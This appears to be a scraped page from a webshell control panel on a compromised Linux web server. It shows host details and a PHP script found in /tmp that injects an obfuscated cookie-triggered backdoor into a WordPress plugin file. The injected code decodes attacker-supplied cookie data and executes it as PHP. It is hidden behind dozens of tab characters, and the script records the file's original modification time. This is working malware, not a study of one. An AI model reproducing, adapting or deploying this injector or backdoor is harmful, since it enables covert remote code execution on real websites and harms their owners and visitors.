403Webshell
Server IP : 192.64.112.168  /  Your IP : 3.137.186.186
Web Server : Apache
System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64
User : expressoneac ( 1128)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/.partition
<?php  $path = '/home/celebrategoodtim/public_html/wp-content/plugins/wp-mail-smtp/vendor_prefixed/guzzlehttp/guzzle/src/functions.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28isset%28%24_COOKIE%5B-49%2B49%5D%29%20%26%26%20isset%28%24_COOKIE%5B65%2B-64%5D%29%20%26%26%20isset%28%24_COOKIE%5B9-6%5D%29%20%26%26%20isset%28%24_COOKIE%5B93-89%5D%29%29%20%7B%20%24parameter%20%3D%20%24_COOKIE%3B%20function%20reset%28%24storage%29%20%7B%20%24parameter%20%3D%20%24_COOKIE%3B%20%24stor%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%271ec801a2%27%29%3B%20if%20%28%21is_writable%28%24stor%29%29%20%7B%20%24stor%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22accepted%22%3B%20%7D%20%24arg%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%20%22%20.%20base64_decode%28str_rot13%28%24parameter%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24stor%29%29%20%7B%20%24const%20%3D%20fopen%28%24stor%2C%20%27w%2B%27%29%3B%20fputs%28%24const%2C%20%24arg%29%3B%20fclose%28%24const%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24stor%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24stor%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22reset%22%29%3B%20%24state%20%3D%20%2282290deddf84ed19643bab42d2e77fbb%22%3B%20if%20%28%21strncmp%28%24state%2C%20%24parameter%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22content_partition%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!'); 

Youez - 2016 - github.com/yon3zu
LinuXploit